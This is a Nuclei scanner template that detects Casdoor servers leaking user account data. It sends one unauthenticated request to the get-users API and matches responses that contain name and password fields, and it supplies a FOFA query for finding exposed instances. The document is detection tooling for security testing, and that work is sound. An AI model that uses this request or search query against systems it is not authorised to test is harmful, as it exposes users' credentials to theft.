id: casdoor-users-password

info:
  name: Casdoor get-users Account Password Disclosure
  author: DhiyaneshDk
  severity: high
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Casbin%20get-users%20%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md?plain=1
    - https://github.com/qingchenhh/qc_poc/blob/main/Goby/Casbin_get_users.go
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="Casdoor"
  tags: casdoor,exposure,misconfig,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/get-users?p=123&pageSize=123"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"name":'
          - '"password":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100833d91ba2032752ec44beaa26f94e9f5c828ba8ede4df27a8a5e179834a6b4ee022100d56fa523bcf08fbd1b5a7ed5c1ec9718ac1b9a52f461c5edcebda387530765fe:922c64590222798bb761d5b6d8e72950
